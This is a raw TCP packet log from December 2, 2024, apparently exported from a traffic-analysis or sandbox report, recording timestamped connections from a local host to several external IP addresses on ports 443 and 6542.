                                                                  Dec 2, 2024 18:44:44.563749075 CET49907443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:44.563780069 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:44.564081907 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:44.564209938 CET49907443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:44.564596891 CET49907443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:44.607338905 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:45.375230074 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:45.375328064 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:45.375535965 CET49907443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:45.391731977 CET49907443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:45.391757011 CET44349907172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:46.559746981 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:46.559782982 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:46.560103893 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:46.563648939 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:46.563659906 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:47.825994968 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:47.826069117 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:47.826560974 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:47.826570034 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:47.828161001 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:47.828166962 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:48.595521927 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:48.595621109 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:48.595650911 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.595839024 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.608772993 CET49916443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.608791113 CET44349916172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:48.782219887 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.782263041 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:48.783664942 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.784724951 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:48.784737110 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:49.788986921 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:49.816188097 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:44:49.831898928 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:49.832034111 CET497056542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:44:49.910119057 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:44:49.910171032 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:49.953394890 CET654249705103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:44:49.953814983 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:44:49.953871012 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:44:49.954226017 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:44:49.954269886 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:50.122529984 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:50.122591972 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.123420000 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.123435974 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:50.125710964 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.125715971 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:50.916172028 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:50.916280031 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:50.916285992 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.916352034 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.923922062 CET49922443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:50.923966885 CET44349922172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:51.036525965 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:51.036576986 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:51.036844015 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:51.037282944 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:51.037298918 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:52.316227913 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:52.316274881 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:52.316823006 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:52.316833973 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:52.318432093 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:52.318435907 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:52.721628904 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:52.755367041 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:44:52.847210884 CET65424976194.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:44:52.847801924 CET497616542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:44:52.880256891 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:44:52.883827925 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:44:53.062433958 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:53.062530041 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:53.062545061 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.062798023 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.066171885 CET49928443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.066190958 CET44349928172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:53.075766087 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.075798988 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:53.075994015 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.076241016 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:53.076255083 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:54.395657063 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:54.395713091 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:54.396363974 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:54.396373987 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:55.854160070 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:55.854183912 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.200725079 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.200793982 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.200809002 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.200851917 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.200896978 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.200944901 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.200952053 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.200993061 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.201397896 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.201448917 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.201455116 CET44349934172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.201492071 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.202385902 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.202385902 CET49934443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.205903053 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.205936909 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:56.206022978 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.206268072 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:56.206279993 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:57.622154951 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:57.622227907 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.118972063 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.118972063 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.118993044 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.119003057 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.119420052 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.119483948 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.451410055 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.451493979 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.451509953 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.451553106 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.451555967 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.451570034 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.451607943 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.451875925 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.451931953 CET44349941172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.452022076 CET49941443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.457237959 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.457295895 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:44:59.457375050 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.457715034 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:44:59.457729101 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:00.747674942 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:00.747773886 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.085089922 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.085184097 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.085299969 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.085309029 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.085573912 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.085638046 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.909151077 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.909650087 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.909684896 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.909878969 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.909912109 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.910542965 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.911082029 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.911117077 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.911149979 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.911180973 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:02.911192894 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:02.911210060 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.715878963 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.715920925 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.715928078 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.715965033 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.715984106 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.720927000 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.720944881 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.721023083 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.721030951 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.721091986 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.725908995 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.725924969 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.725961924 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.725969076 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.725996017 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.726016045 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.747092009 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.861685038 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.861707926 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.861743927 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.861778021 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.861794949 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.861814976 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.864664078 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.864680052 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.864718914 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.864739895 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.864759922 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.864779949 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.867588997 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.867604971 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.867640972 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.867657900 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.867685080 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.867705107 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.870944023 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.870959044 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.870995998 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.871021032 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.871037960 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.871059895 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.873987913 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.874005079 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.874047995 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.874058008 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.874084949 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.874104023 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.877296925 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.877311945 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.877346992 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.877355099 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.877381086 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.877398968 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.880464077 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.880480051 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.880517006 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.880523920 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.880553961 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.880564928 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.884643078 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.885746002 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.885761976 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.885847092 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.885848045 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:03.885858059 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:03.885899067 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.024939060 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.062613964 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.062638998 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.062689066 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.062705994 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.062745094 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.062769890 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.065871954 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.065888882 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.065936089 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.065946102 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.065972090 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.065989971 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.069108009 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.069128036 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.069173098 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.069180012 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.069207907 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.069221020 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.070605040 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.072312117 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.072333097 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.072365999 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.072400093 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.072406054 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.072449923 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.075489044 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.075505018 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.075537920 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.075545073 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.075572014 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.075596094 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.078699112 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.078721046 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.078752041 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.078758001 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.078783989 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.078803062 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.082076073 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.082092047 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.082146883 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.082154989 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.082192898 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.083450079 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.083504915 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.083511114 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.083523989 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:04.083549976 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.083580971 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.085707903 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.148637056 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.903793097 CET49950443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:04.903826952 CET44349950172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:05.059784889 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:05.059849024 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:05.060059071 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:05.063792944 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:05.063807964 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:06.326668978 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:06.326720953 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:06.327534914 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:06.327548027 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:06.328114033 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:06.328119993 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:07.063606977 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:07.063708067 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:07.063709021 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.063963890 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.068923950 CET49962443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.068950891 CET44349962172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:07.103200912 CET49968443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.103257895 CET44349968172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:07.103405952 CET49968443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.103741884 CET49968443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:07.103756905 CET44349968172.67.217.190192.168.2.5
                                                                  Dec 2, 2024 18:45:08.104067087 CET49968443192.168.2.5172.67.217.190
                                                                  Dec 2, 2024 18:45:08.435543060 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:08.435587883 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:08.435666084 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:08.436075926 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:08.436089993 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:09.729938984 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:09.730000973 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:09.750797987 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:09.750809908 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:09.750947952 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:09.750952959 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:09.751091003 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:09.751153946 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.273225069 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:12.273286104 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.273296118 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:12.273334980 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:12.273354053 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.273367882 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.276329041 CET49972443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.276344061 CET44349972104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:12.368041992 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.368113995 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:12.368181944 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.368586063 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:12.368599892 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:13.691968918 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:13.692034960 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:13.692490101 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:13.692503929 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:13.693682909 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:13.693689108 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:15.320888042 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:15.320974112 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:15.320974112 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:15.321043015 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:15.324584007 CET49980443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:45:15.324603081 CET44349980104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:45:15.670229912 CET49986443192.168.2.5104.21.68.89
